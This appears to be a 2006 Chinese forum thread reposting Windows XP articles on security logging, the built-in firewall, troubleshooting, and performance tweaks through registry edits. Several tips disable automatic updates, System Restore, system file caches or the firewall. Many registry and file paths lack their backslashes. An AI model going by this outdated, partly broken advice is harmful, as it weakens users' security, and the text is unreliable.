  八、处理操作系统安全日志装满时的情况

??1.首先打开事件查看器。单击“开始”→“设置”,然后请你单击“控制面板”,双击“管理工具”,然后再双击“事件查看器”即可。

??2.在随后出现的控制台树中,用右键单击“安全日志”,然后单击“属性”。

??3.接着在“常规”选项卡上,单击“改写久于n天的事件”(默认是7天前)或“不改写事件(手动清除日志)”。

??4.改变日志文件的大小,默认是512KB。

  5.接下来点击“开始”→“运行”,再输入“RegEdit”命令打开注册表编辑器,找到HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Control\Lsa分支,这时用右键点击“CrashOnAuditFail”,选择创建“REG_DWORD”类型,赋值为1即可。

??6.完成此操作后,需要重新启动你的计算机。
作者: 语苛经历    时间: 2006-10-23 21:33
Windows XP防火墙深层探索



小编:网络安全问题现在已经越来越突出,选择一种防火墙产品是很有必要的。基于应用程序的防火墙在使用上相当麻烦,而且一般都非常占用系统资源。Windows XP集成了互联网连接防火墙(Internet Connection Firewall)这一新特性,它到底可以为我们做什么呢?

人们现在已习惯在Internet上花费大量时间。随着ADSL和宽带网络的普及,人们在Internet上的时间越来越长,个人电脑的安全问题将会变得越来越突出。有统计表明黑客们在每天24小时扫描拨号连接的用户,当然他们的目标并不是我们这些普通上网用户,而是那些使用VPN在家办公的用户。突破这些用户的个人电脑总比突破层层设防的公司网络要容易得多。如果你是使用DSL或其他宽带网络的用户,那么你的危险将更大了,因为在使用DSL后,你的IP地址将很长时间不变,这无疑给那些黑客带来了很大的便利。我们当然可以选用一些现有的个人防火墙产品,比如说Norton的个人防火墙产品,Zone Labs的ZoneAlarm,以及国内厂商开发的天网防火墙等等。这些个人防火墙产品依据的防黑客原理通常不一样,例如Norton的Personal Firewall(个人防火墙)是基于应用程序的(Application Level)。基于应用程序的防火墙在使用上相当麻烦,因为你必须要为每一个访问Internet的程序设置策略。而随着策略的增多,防火墙的效率也逐步下降,况且过多的策略也会相互矛盾、影响,给系统安全带来漏洞。更糟糕的是,这些个人防火墙产品都非常占用系统资源。

Windows XP号称是随着Windows发布以来最伟大的升级,Windows XP给我们带来了很多新的特性,互联网连接防火墙(Internet Connection Firewall,以下简称ICF)就是其中的一个新的特性。下面我们就来谈谈这个ICF,看看它到底能为我们做什么(注:我们在谈ICF的时候都是以Norton的Personal Firewall来做参考和对比的,原因有二:其一,Norton的产品无论在国外还是在国内都是第一流的产品;其二,Norton的这款产品也可以代表这一类产品的技术特点)。

ICF的工作原理
ICF就像一个在你的个人电脑和外部Internet世界建立的虚拟盾牌,它可以让你请求的数据通过、而阻碍你没有请求的数据包,是一个基于包的防火墙。黑客们的攻击基本上都是由Ping一个IP地址开始的。当Ping通之后通常都是使用一些软件来进行端口扫描。攻击一台个人电脑和攻击一台主机还是有一点不同的。攻击主机时目标通常是早已锁定的,即便Ping不通也不会认为目标主机已经关机了;但是攻击个人电脑就不同了,通常黑客们是通过扫描一段IP地址开始来锁定目标,或者是个人电脑的用户在使用ICQ之类的软件时暴露了自己的IP地址。对于第一种的情况,Ping不通的IP地址通常被认为没有使用而忽略过去。所以,ICF的第一个功能就是不响应Ping命令,而且,ICF还禁止外部程序对本机进行端口扫描,抛弃所有没有请求的IP包。个人电脑同服务器不一样,一般不会提供例如Ftp、Telnet等服务,这样可以被黑客们利用的系统漏洞就很少。所以,ICF可以在一定的程度上很好地保护我们的个人电脑。

ICF是通过保存一个表格,记录所有自本机发出的目的IP地址、端口、服务以及其他一些数据来达到保护本机的目的。 当一个IP数据包进入本机时,ICF会检查这个表格,看到达的这个IP数据包是不是本机所请求的,如果是就让它通过,如果在那个表格中没有找到相应的记录就抛弃这个IP数据包。下面的例子可以很好地说明这个原理。当用户使用Outlook Express来收发电子邮件的时侯,本地个人机发出一个IP请求到POP3邮件服务器。ICF会记录这个目的IP地址、端口。当一个IP数据包到达本机的时候,ICF首先会进行审核,通过查找事先记录的数据可以确定这个IP数据包是来自我们请求的目的地址和端口,于是这个数据包获得通过。当使用Outlook客户端邮件程序和Exchange邮件服务器时情况有所不同。一旦有新的邮件达到Exchange邮件服务器时,Exchange就会自动发一个IP数据包到Outlook客户机来通知有新的邮件到达。这种通知是通过RPC Call来实现的。当Exchange的IP数据包到达客户机时,客户机的ICF程序就会对这个IP包进行审核发现本机并没有对这个地址和端口发出IP请求,所以这个IP包就会被抛弃,客户机当然就不会收到发自Exchange邮件服务器的新邮件通知。手动让Outlook去接收Exchange邮件服务器上的新邮件当然是可以的。

ICF的局限性
那么,ICF不能做什么?ICF可不可以完全替代现有的个人防火墙产品?ICF是通过记录本机的IP请求来确定外来的IP数据包是不是“合法”,这当然不可以用在服务器上。为什么呢?服务器上的IP数据包基本上都不是由服务器先发出,所以ICF这种方法根本就不可以对服务器的安全提供保护。当然你也可以通过相应的设置让ICF忽略所有发向某一端口的数据包,例如80端口。那么发向80端口的所有数据包都不会被ICF抛弃。从这种意义上讲80端口就成为不设防的端口。这样的防火墙产品是不可能用在应用服务器上的,服务器上的防火墙产品都是基于建立各种策略来审核外来的IP数据包。ICF和基于应用程序的个人防火墙产品也是不一样的。基于应用程序的个人防火墙会记录每一个访问Internet的程序,例如,通过设置可以让IE有权来访问Internet而Netscape的Navigator没有权限来访问Internet,即便两个程序的目的IP地址和端口都是一样的。Norton的个人防火墙(Personal Firewall)就是这样一个典型的产品。简而言之,ICF没法提供基于应用程序的保护,也没法建立基于IP包的包审核策略。所以,ICF既不能完全替代现有的个人防火墙产品,也没有办法很好地工作在应用服务器上。

如何选择
那我们应该如何选择?笔者认为,Norton的Personal Firewall可以提供全方面的保护,即便这种保护是建立在繁琐的设定基础上的。在它能成功地为你提供一次有效的防护之前,会给你带来足够的烦恼。ICF并不能提供完全无懈可击的防护,但是ICF对个人电脑提供防护是足够的。在使用Shield Up对装有ICF的个人电脑进行端口扫描后,Shield Up 给出了“最安全模式”(Full Stealth Mode)的评价,这也是Shield Up对安全评价的最高等级。况且,ICF是Windows XP内建的功能,占用的资源相当少且不用花额外的钱去购买。其实从ICF受益最多的应该是那些仍然在使用Modem上网的朋友,实际上这部分用户占了50%以上,而在国内绝大部分的用户都是用Modem上网的。用Modem上网有其自身的特点,首先,你上网的时间不会太长,一般在几小时上下(包月的除外)。其次,每次建立连接后拨号服务器都会分配一个新的IP地址给你,长时间占用一个相同的IP的可能性应该很低。比起使用DSL和宽带的用户来讲,用Modem上网本身就安全了很多。所以,使用一个重量级的防火墙实在是没有太多的意义。而ICF则刚刚好,它既提供了一定的保护,而且又不太占用资源,真的是“刚刚好”!

怎样使用ICF
我们谈了这么多,那ICF到底该怎样使用?当你建立一个新的连接的时候,向导程序就会问你是否要激活ICF。在每一个连接的属性→高级选项中也可以让你选择激活或者取消ICF功能。在你激活ICF之后,在高级选项的下部就会出现“设置”按钮,单击设置就可以对ICF进行进一步的设置。ICF的设置主要有三部分:第一部分是服务项。通过设定这一部分可以让ICF对某些服务不进行审核。TCP/IP的服务都是由端口来区分的,你可以分别对TCP、UDP或者IP Protocol进行设置,在这一项中已经有了一些可选的缺省设置。当然你可以建立自己的设置。第二部分是关于日志的。ICF可以把它所抛弃的IP数据包以及获准通过的IP数据包都记录在案以便可以让你进行进一步的分析。第三部分就是关于ICMP的,ICMP通常用于Ping、Tracert程序以及路由的动态实现,我的建议是禁止所有的ICMP响应除非你有特别的需要。

定期分析日志可以发现潜在的安全问题,ICF的日志分为两部分:一部分是ICF审核通过的IP数据包,而另一部分就是ICF抛弃的IP数据包。日志一般存于Windows目录之下,文件名是pfirewall.log。其文件格式符合W3C扩展日志文件格式(W3C Extended Log File Format),分为两部分,分别是文件头(Head Information)和文件主体(Body Information)。文件头主要是关于pfirewall.log这个文件的说明,需要注意的主要是文件主体部分。文件主体部分记录有每一个成功通过ICF审核或者被ICF所抛弃的IP数据包的信息,包括源地址、目的地址、端口、时间、协议以及其他一些信息。理解这些信息需要较多的TCP/IP协议的知识。

在实际的使用中应尽量避免在局域网中使用ICF,它可能会给一些网络应用带来影响。在个人电脑中使用也可能会对一些程序的运行带来影响。例如,OICQ的“语音世界”功能就是建立在双方交互的基础上的,而ICF会影响这些交互过程从而使得连接无法建立。解决这样的问题也很简单,一种当然是取消ICF,但这不是推荐的方法。另一种方法就是找到到底OICQ使用哪个端口来实现语音功能,在前面介绍的属性→高级→设置→服务中来添加一项自定义设置从而使ICF忽略这个端口的检测。这样,OICQ的语音功能就可以正常使用了。

总之,ICF是Windows XP提供的一项新的功能,它并不是用来取代现有的个人防火墙产品,但是ICF能够为个人电脑提供相当的保护。我们为获得在网络上的安全所需要做的就是在建立连接的时候选择使用ICF,在需要的时候作出必要的设定,并且定期查看日志。当然,最先要做的就是购买Windows XP的家用或者专业版,并把它们安装起来。
作者: 语苛经历    时间: 2006-10-23 21:35
★为何我在DOS下安装Windows XP 很慢
  哈哈,你一定没有在安装前运行smartdrv.exe,如果不运行这个,可能一个晚上你也安装不完。Smartdrv.exe这么文件在windows 98/me的光盘或是windows/command/里有。

  ★为何安装过程中系统提示我必须转化分区为NTFS

  哈哈,这个是因为你在windows 下安装的时候安装的不仔细,刚开始安装的时候有个高级-再安装过程中允许我选择安装到的分区。重新运行安装程序,记得选择这个,然后重新启动后就可以选择安装到的分区和是否保留原分区格式,或是格式化为NTFS OR FAT32等等。

  ★为何我的modem不能在XP下工作

  这个主要是因为驱动程序的问题,很多猫的Windows 2000下的驱动程序也不能在XP下用了,不过倒是有些猫的98的驱动程序可以在XP下用。另外,金网霸ESS芯片的内猫以及一些rockwell芯片的内猫都可以在XP下很好的工作,用XP自带的驱动即可,而且对于金网霸内猫的用户XP下的驱动没有了像Windows 2000下那样电话打进来就死机的问题了。

  ★为何我安装了 Windows XP 关机总是变成重起

  哈哈,能遇到这个问题算你幸运了,这个问题是有些主板的高级电源管理不能被WindowsXP支持。一般用AWARD的BIOS的主板的电脑没有这个问题,到目前为止,遇到AMI的BIOS的主板有这个问题,如技嘉的主板。解决的办法是升级你的主板的BIOS,即刷新BIOS.,哈哈,可不要刷错了型号。

  ★为何我的QQ在 Windows XP下运行很慢

  这个问题好像是目前版本的QQ和Windows XP不大兼容,尤其是老的版本,QQ710还可以,难道是微软为了推广MSNMessenger故意这么做的?哈哈哈……看来我们要等QQXP了。

  ★为何我的Windows XP 下的Internet Explorer 运行很慢

  这个问题嘛,如果你的机器CPU和内存够用的话,一般没这个问题。不过嘛,我发现,如果你对IE的高级选项里的东西做了改动,如一些效果等等,本来关掉这些效果为了加速IE,其实,这时就会出现IE运行很慢,尤其是显示上面的菜单和工具栏的时候。解决办法就是高级选项的面板上,点击默认,使用IE默认的设置即可。

  ★为何我的 Windows XP 安装了简体中文语言包后还是英文的

  在一些BBS上,我发现很多朋友不大会安装这个语言包,其实安装好了后,欢迎屏幕已经由WELCOME变成了欢迎了,至于界面,到控制面板,地区区域选项,菜单显示,选择简体中文即可,注销后重新登录即可。如果你不选择所有用户都使用这个配置的话,你会发现,其它用户里面还是英文界面的,哈哈,这次可以中英文版同时用了。

  ★为何MPEG4格式AVI在Windows Media Player 8.0 不能放

  有时候用Media player放avi的时候只有声音没有图像,或是不能放,这是由于缺少解码器的原因,到www.divx.com 下载安装divx即可。

  ★为何安装了Windows XP后,我的其它操作系统里的Norton antivirus 2001不能用了

  这个是由于Norton2002以前版本的Norton杀毒软件和Windows XP不兼容,而且要命的是这个不兼容是由于新版的操作系统的ntldr,ntdetect.com, 冲突造成的,如果你不用旧版的文件代替,即使删掉Windows XP也没用的。解决办法是到symantic的网站下载补丁,或是使用norton2002,目前norton antivirus 2002可以很好的在XP下运行。

  ★为何PS手柄驱动不能在XP下用

  更换手柄驱动程序可以解决。去这里下载:www.topcmm.com下载后,如果运行setup安装不成功,用添加删除新硬件安装驱动。

  ★关于局域网里Windows XP 的网络问题

  Windows XP的安全性提高,默认不启用NBT.有时候,在局域网里使用自带的防火墙会出现的访问问题,关掉防火墙即可。

  ★关于Windows XP下的显卡驱动问题

  Windows XP自带了FOR NVIDIA系列的显卡驱动程序一般没有问题,而目前的新版的雷管XP驱动在某些机器上安装后会出现问题,建议大家使用系统自带的驱动。NVIDIA目前正在修正雷管驱动。

  ★Windows XP 安装好后,如何把FAT 32转化为NTFS

  使用convert命令,在命令行模式下用convert.exe这个命令随时转化的。例如:
convert c: /fs:ntfs把c盘转化为NTFS.

  ★Windows XP下如何创建启动软盘

  插入软盘,然后在软盘驱动器的图标上点击右键,弹出菜单选择格式化,在格式化窗口里最下边选择创建MS-DOS启动盘即可。
作者: 语苛经历    时间: 2006-10-23 21:36
Windows XP鲜为人知的70招
一、Windows XP优化
恢复Windows经典界面
很多人安装了Windows XP后的第一感觉就是Windows变得漂亮极了。只是可惜美丽的代价要耗掉我们本就不富裕的内存和显存。要想恢复到和经典Windows类似的界面和使用习惯,请在桌面上单击鼠标右键,选择“属性”命令即可进入“显示属性”的设置窗口。这里共有“主题”、“桌面”、“屏幕保护程序”、“外观”和“设置”五个选项卡。在当前选项卡的标签上会有一条黄色的亮色突出显示,默认是“主题”选项卡,这里我们只要在“主题”的下拉选单里选择“Windows经典”,立即就可以在预览窗口看到显示效果,同时,外观选项卡的内容也会随之进行更改。
注意:Windows XP中“主题”和“外观”选项卡是息息相关的,只要更改其中的任何一个选项,在另一个选项卡中也会看到相应的改变。

恢复“开始”菜单
Windows XP新的“开始”菜单还是挺方便的,对系统资源的影响也不大。如果你喜欢过去的经典菜单的话,用鼠标右键单击任务栏空白处,选择“属性”菜单,进入“任务栏和开始菜单属性”的设置窗口,选择“[开始]菜单”选项卡,选择“经典[开始]菜单”即可恢复到从前的模样了。

优化视觉效果
Windows XP的操用界面的确是很好看,好看的背后是以消耗大量内存作为代价的,相对于速度和美观而言,我们还是宁愿选择前者,右键单击“我的电脑”,点击“属性/高级”,在“性能”一栏中,点击“设置/视觉效果”,在这里可以看到外观的所有设置,可以手工去掉一些不需要的功能。在这里把所有特殊的外观设置诸如淡入淡出、平滑滚动、滑动打开等所有视觉效果都关闭掉,我们就可以省下“一大笔”内存。

禁用多余的服务组件
Windows XP和Windows 2000一样可以作为诸如Http服务器、邮件服务器、FTP服务器,所以每当Windows XP启动时,随之也启动了许多服务,有很多服务对于我们这些普通用户来说是完全没用的,所以关掉它们是一个很好的选择。操作的方法是:右键单击“我的电脑”,依次选择“管理/服务和应用程序/服务”,将不需要的服务组件禁用。
注意:有些服务是Windows XP必需的,关闭后会造系统崩溃。查看详细说明确认后再禁止。
编者注:对于Windows XP常见的90个服务,本文将有专门章节分析。

减少启动时加载项目
许多应用程序在安装时都会自作主张添加至系统启动组,每次启动系统都会自动运行,这不仅延长了启动时间,而且启动完成后系统资源已经被吃掉不少!我们可以减少系统启动时加载的程序,方法是:选择“开始”菜单的“运行”,键入“msconfig”启动“系统配置实用程序”,进入“启动”标签,在此窗口列出了系统启动时加载的项目及来源,仔细查看你是否需要它自动加载,否则清除项目前的复选框,加载的项目愈少,启动的速度自然愈快。此项需要重新启动方能生效。

关闭系统还原功能
“系统还原”功能是Windows系列操作系统的一个重要特色,当Windows运行出现问题后,还原操作系统。“系统还原”虽然对经常犯错误的人有用,但是它会让你的硬盘处于高度繁忙的状态,你会发现你的硬盘总是忙个不停,因为Windows XP要记录操作,以便日后还原。如果你对自己有信心,那么就不要使用它,因为它可占不少内存。
关闭系统还原功能方法是:单击“开始/所有程序/附件/系统工具/系统还原”,在系统还原界面,单击“系统还原设置”进入“系统还原设置”窗口,清空“在所有驱动器上关闭系统还原”复选框,这样Windows XP就会删除备份的系统还原点,从而释放它占用的磁盘空间。
一般来说,为了兼顾系统性能和系统安全,笔者建议打开Windows XP所在盘符的系统还原功能。

关闭自动更新
“自动更新”是Windows XP为了方便用户升级系统而推出的一种新功能,这种功能可以在微软推出系统升级补丁或系统安全补丁的时候,自动提醒用户升级自己的系统,不过这种功能有一个要求,就是用户必须时时在线,但是对于我们这些缺铁少银的“穷人”来说,这个要求未免苛刻,所以我们把“自动升级”功能关闭掉,改为“手动升级”。
关闭自动更新具体操作为:右键单击“我的电脑/属性/自动更新”,在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。 

关闭远程桌面
这个功能的一个特点就是可以让别人在另一台机器上访问你的桌面。在局域网中,这个功能很有用。比如你有问题了可以向同事求助,他可以不用到你的跟前,直接通过“远程桌面”来访问你的机器帮你解决问题。但是对于我们只有一台计算机的 普通用户来说这个功能就显得多余了,所以我们把它关掉,不让它在那儿白白浪费内存。具体操作为:右键单击“我的电脑”,选择“属性/远程”,把“远程桌面”里的“允许用户远程连接到这台计算机”勾去掉。

禁用消休眠功能
Windows XP的休眠可以把内存中当前的系统状态完全保存到硬盘,当你下次开机的时候,系统就不需要经过加载、系统初始化等过程,而直接转到你上次休眠时的状态,因此启动非常快。但它会占用大量的硬盘空间(和你的内存大小一样),可以到“控制面板/电源选项/休眠”中将其关闭,以释放出硬盘空间,待到要需要使用时再打开即可。方法是:单击“开始/控制面板/电源管理/休眠”,将“启用休眠”前的勾去掉。

关闭“自动发送错误报告”功能
大家在Window XP 中肯定有这样的经历,一旦一个程序异常终止,系统就会自动跳出一个对话框问你是否将错误发送给微软,这就是XP中的“自动发送错误”功能,它可以将错误信息发送到微软的网站。虽然微软一再信誓旦旦地表示,可以提供强大的安全保障,不会泄露个人隐私,但是发送给微软的信息中有可能包含你正在浏览或编辑的文档信息,也许这正包含了个人隐私或是公司机密,因此如果你想保障自己应有的权利,我们应该义无反顾的把这项功能关掉。方法是:单击“开始/控制面板/系统/高级”,单击“错误报告”按钮,然后选中“禁用错误报告”,下面的“但在发生严重错误时通知我”可以选中。

关闭“Internet时间同步”功能
“Internet时间同步”就是使你的计算机时钟每周和Internet时间服务器进行一次同步,这样你的系统时间就会是精确的,不过这个功能对我们来说用处不大,而且还可能引起死机的问题。一般来说,只要在安装完Windows XP以后同步一次时间就可以了。所以我们要把它关掉。具体操作是:依次单击“开始/控制面板/日期、时间、语言和区域选项”,然后单击“日期和时间/Internet时间”。


合理设置虚拟内存
对于虚拟内存文件,Windows XP为了安全默认值总是设的很大,浪费了不少的硬盘空间,其实我们完全可以将它的值设小一点。方法是:进入“控制面板/系统/高级/性能/设置/高级/虚拟内存/更改”,来到虚拟内存设置窗口,首先确定你的页面文件在哪个驱动器盘符,然后将别的盘符驱动器的页面文件全部禁用。建议你把它是设置到其他分区上,而不是默认的系统所在的分区,这样可以提高页面文件的读写速度,有利于系统的快速运行。根据微软的建议,页面文件应设为内存容量的1.5倍,但如果你的内存比较大,那它占用的空间也是很可观的,所以,建议如果内存容量在256MB以下,就设置为1.5倍,最大值和最小值一样,如果在512MB以上,设置为内存容量的一半完全可行。

删除多余文档
Windows XP中有许多文件平时我们很少用到,放在硬盘中,白白浪费空间,降低系统性能。我们完全可以把这些用不到的文件删除,需要删除的文件有:
帮助文件:在C:WindowsHelp目录下。
驱动备份:C:Windowsdriver cachei386目录下的Driver.cab文件。
系统文件备份: 一般用户是不怎么用的,利用命令sfc.exe /purgecache删除。
备用的dll文件:在C:Windowssystem32dllcache目录下。
输入法:在C:WindowsIme文件夹下直接删除chtime、imjp8_1、imkr6_1三个目录即可,分别是繁体中文、日文、韩文输入法。

删除WindowsXP中隐含的组件
Windows XP在正常安装之后,会自动安装许多组件,这些组件有许多是平时用不到的,安装在系统中会占用很多空间,降低系统性能,我们可以用下述方法删除不用的组件。
用记事本修改C:WindowsInf目录下的Sysoc.inf文件,用查找/替换功能,在查找框中输入“,hide”(一个英文逗号紧跟hide),将“替换为”框设为空。并选全部替换,这样,就把所有的“,hide”都去掉了,存盘退出,再单击“开始/控制面板/添加或删除程序”,就可以看到许多平时见不到的组件,选择不需要程序进行删除即可。

清理垃圾文件
Windows XP在正常的使用过程中会产生扩展名为TMP、BAK、OLD之类的垃圾文件,你可以用Windows的搜索功能,查出这些文件,然后把它们删除。另外Windows XP默认会在系统失败时记录错误事件,并写入调试信息,这些文件信息我们完全可以弃之不用。方法是单击“开始/控制面板/系统/高级/启动和故障恢复”,清空“将事件写入日志文件”,在“写入调试信息”下拉框里选“无”即可。


禁止MSN随Windows启动
每次启动Windows时,Messenger总是自动运行,即使你不想启动它,可是它也自动运行,非常烦人,我们能不能禁止它,不让它随Windows启动呢?回答是可以的。
第一种方法:
1.在“开始”菜单中单击“运行”,在“打开”框中输入“msconfig”,“确定”后打开“系统配置实用程序”窗口。
2.单击“启动”选项卡,在“启动项目”列表中,清除“MSMSGS”前的复选框,单击“确定”按钮。
3.当系统提示“重新启动计算机”时,请单击“是”按钮。
第二种方法:
1.打开“注册表编辑器”窗口。
2.依次展开“KEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun”分支,然后在右窗格中右键单击“MSMSGS”,再单击快捷菜单中的“删除”命令,当当系统提示确认删除时,请单击“是”按钮。
经过设置,MSN就再也不会随Windows XP的启动而启动了。

优化带宽
Windows XP专业版新增了QoSRRP(这是Quality of Service Resource Reservation Protocol的缩写,意为服务质量资源预留协议)。一般来说,试图通过可用带宽访问信息的时候,应用程序要么通过QoS应用程序接口,要么通过另一个称为TCI的应用程序接口。在网络通讯上,为了商业方面的安全性保留了一定的频宽给了管理者,这对于QoS应用程序来说无疑是件好事,但是一般使用者便不需要此功能,无形中就有部分(默认为20%)带宽白白浪费了,因此我在此提供取消此功能的方法。
选择“开始”菜单,点击“注销”,进到登录的主画面,在登录的主画面中按下Ctrl+Alt+Del两次出现了登录窗口,在使用者名称中输入Administrator(注:要区分大小),密码栏中填入自设密码(若没有设定密码者空白即可)按确定进入Windows,单击“开始/运行”输入gpedit.msc进入到“组策略”窗口,在左边窗口中选取“计算机配置/管理模板/网络/QoS数据包调度程序”,在右边的窗口中双击“限制可保留的带宽”,选择“已启用”并将“带宽限制(%)”设为0,单击“应用”,然后“确定”,重新启动即可。
注意:Windows XP家庭版的使用者不必更改这些设置。

作者: 语苛经历    时间: 2006-10-23 21:37
删除多余字体
Windows XP中安装的字体越多,就会占用更多的内存的系统资源,减慢系统的运行速度,因此,对于不常用的字体,我们最好把它从系统中删除。字体文件存放在C:Windowsfont目录下,你完全可以根据需要选择一些字体,对于更多不用的字体,一删了之。

更改IE临时文件夹
上网时产生的大量临时文件都存放在IE临时文件夹中,默认情况下,临时文件夹是在系统分区上,大量的临时文件会影响硬盘读写系统文件的性能。你可以更改临时文件的位置来避免出现这种情况。方法是单击“开始/控制面板/Internet选项”,在“常规”选项卡中单击“设置”按钮,在打开的窗口中单击“移动文件夹”按钮,指定一个非系统分区上的文件夹,单击“确定”后,临时文件就会移到指定的文件夹上。

加快“网上邻居”共享的速度
不知道各位使用者用Windows XP开“网上邻居”里面的共享资源时,有没有发现所花的时间相当的长,这是因为它会检查其它计算机中的设定工作,有时甚至就在那边停了将近一分钟,相当讨厌,大家可以通过下面的方法将其检查的步骤取消:选择“开始/运行”,输入regedit,在弹出注册表编辑器中寻找[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/
Explorer/RemoteComputer/NameSpace],按鼠标右将在此位置的{D6277990-4C6A-11CF-8D87-00AA0060F5BF}删除之即可。

清除预读文件
当Windows XP使用一段时间后,安装目录下的预读文件夹(C:Windowsprefetch)里的文件会变的很大,里面会有死链接文件,这会减慢系统时间,建议你定期删除这些文件。

设置预读以提高速度
Windows XP使用预读设置这一新技术,以提高系统速度。如果你的电脑配置不错,拥有PIII 800, 512M内存以上,你可以进行以下修改:单击“开始/运行”,输入“regedit”,打开注册表,找到[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementPrefetchParametersEnablePrefetcher],设置数值0,1,2,3(0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读),推荐使用“3”,这样可以减少启动时间。

取消不需要的网络服务组件
单击“开始/控制面板/网络连接/本地连接”打开本地连接状态窗口,单击“属性”按钮,打开属性对话框,单击“高级”选项卡,选中“通过限制或阻止来自Internet的对此计算机的访问来保护我的计算机和网络”选项,然后单击“设置”按钮,就可以看到所有已经安装的、Internet用户可以访问的、运行于你的网络上服务,除非你想架设FTP或SMTP服务器,否则不妨全部取消这些项目的选定状态。  

启用DMA传输模式
所谓DMA,即直接存储器存储模式,指计算机周边设备(主要指硬盘)可直接与内存交换数据,这样可加快硬盘读写速度,提高速据传输速率。由于某些原因,Windows XP有时会在IDE通道上使用PIO并行输入输出传输模式,而不是DMA模式。如果有这种情况,用户可以手动把IDE通道改为DMA模式,这样可以减少该设备占用的CPU周期。方法是:右键点击“我的电脑”,选“属性”,点选“硬件”选项卡,单击“设备管理器”按钮,打开“设备管理器”,然后点击展开“IDE ATA/ATAPI 控制器”分支,其中“IDE控制器”有两项“主要IDE通道”及“次要IDE通”,分别选中,依次进入“属性/高级设置”,该对话框会列出目前IDE接口所连接设备的传输模式,检查“传输模式”下拉菜单,把它们全部设“DMA(若可用)”,点击“确定”。

加快菜单显示速度
选择“开始/运行”,输入regedit,弹出注册表编辑,寻找[HKEY_CURRENT_USERControlPanelDesktop],在右边的窗口中选择MenuShowDelay,按鼠标右键,选择“修改”,将其数值资料改为100或更小(默认值为:400),建议不要使用0,因为如此一来只要鼠标一不小心触碰到“所有程序”,整条菜单就会跑出来,那这乱了套。

加快关机速度
Windows XP的开机速度的确比以前版本的操作系统快了很多,但关机速度却慢了不少。如果你在意关机速度的快慢,可以修改几个注册表键值,就可以大大减少Windows关闭所用的时间。首先打开注册表编辑器,找到HKEY_CURRENT_USERControl PanelDesktop,里面有个名为HungAppTimeout的键,它的默认值是5000(如果不是,把它改为5000)。接下来,还有个WaitToKillAppTimeout键,把它的值改为4000(默认值是2000)。最后,找到注册表如下位置:HKEY_LOCAL_MACHINESystemCurrentControlSetControl。同样地,把其中的WaitToKillServiceTimeout键值改为4000。另外,把“控制面板/管理工具/服务”中的NVidia Driver Help服务设为手动,也可以加快Windows关闭时间。

关闭计算机时自动结束任务
在关机的时候,有时会弹出讨厌的对话框,提醒某个程序仍在运行,是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USERControl PanelDesktop 目录,把里面的AugoEndTasks键值改为1。
注意:可能会找不到AutoEndTasks键值,如果是这样的话,自己建一个串值并把它改为这个名字,值设为1就可以了。

关闭华生医生Dr.Watson
单击“开始/运行”,输入“drwtsn32”命令,或者“开始/所有程序/附件/系统工具/系统信息/工具/Dr Watson”,调出系统里的华生医生Dr.Watson ,只保留“转储全部线程上下文”选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。

减少磁盘扫描等待时间
WindowsXP虽然号称稳定,但是并不是永不死机,偶尔也会给你个蓝脸,非法操作后系统会自动扫描,出现大段大段的E文,告诉你刚才系统非正常结束,现在需要检查一下是否出错,可是还要等待一段时间才开始,所以我们可以在dos下,键入“chkntfs/t:0”,表示等待时间为0秒。

删除多余的帐户
如果你的电脑只有你一个人使用,最好只建自己的一个帐户,因为你每建一个帐户,就会在Windows XP的安装目录下的documents and settings下面多一个以你所建帐户为名的文件夹,里面存放着这个帐户的一些资料,有收藏夹、文档、历史记录,系统设置信息等内容,天长日久它占用的空间也是不可小觑的,解决方法就是到“开始/控制面板/用户帐户”里依自己情况删除多余的帐户即可。

让系统自动关闭停止响应的程序
单击“开始/运行”,输入regedit,弹出注册表编辑器,寻找[HKEY_CURRENT_USERControlPanelDesktop],在右边的窗口中选择AutoEndTasks,按鼠标右键,选择“修改”,将其数值资料改为1(默认值为:0)。

IE网络浏览器加速技巧
Windows XP自带Internet Explorer6,有个小技巧,修改之后启动得飞快(在我的机子上,简直是瞬间启动)。具体做法是:右键点击Internet Explorer快捷图标(如任务栏上的快捷启动栏中那个IE图标),打开图标属性之后在“目标”后面加上“-nohome”参数即可。
二、文件管理和操作技巧
加密文件和文件夹
在任何需要加密的文件和文件夹上右键单击鼠标,选择“属性”命令,单击“常规”选项卡,然后依次选择“高级加密内容以便保护数据”后确定就可以了。需要说明是 :Windows XP的加密操作只针对NTFS格式的磁盘分区,它对传统的FAT16和FAT32格式的分区不提供加密支持,如果你想使用加密操作,就需要把磁盘转换为NTFS格式。

自定义文件夹图片
在Windows XP中新增了文件夹图片功能,它提供了比原来的图标内容更多丰富的图片资源供用户选择,你可以利用这一功能把自己喜欢的任意图片设为文件夹图标,方法是:在资源管理器选中任一文件夹,右键单击,选择“属性”命令,在打开的对话框中选择“自定义”选项卡,单击“选择图片”按钮选择作为文件夹图片的图形文件,单击“更改图标”按钮可以文件夹图标,然后单击“确定”即可,以后你在资源管理器中选择以“缩略图”形式查看文件时,就可以看到你定义的文件夹图片。

快速移动和复制文件
在资源管理器中选中你要移动或复制的文件,然后用鼠标右键将文件拖动目的文件夹后松开,会弹出一个菜单,允许你选择复制、移动文件还是创建一个快捷方式,甚至可以取消。
作者: 语苛经历    时间: 2006-10-23 21:38
indows XP资源的共享与安全




s
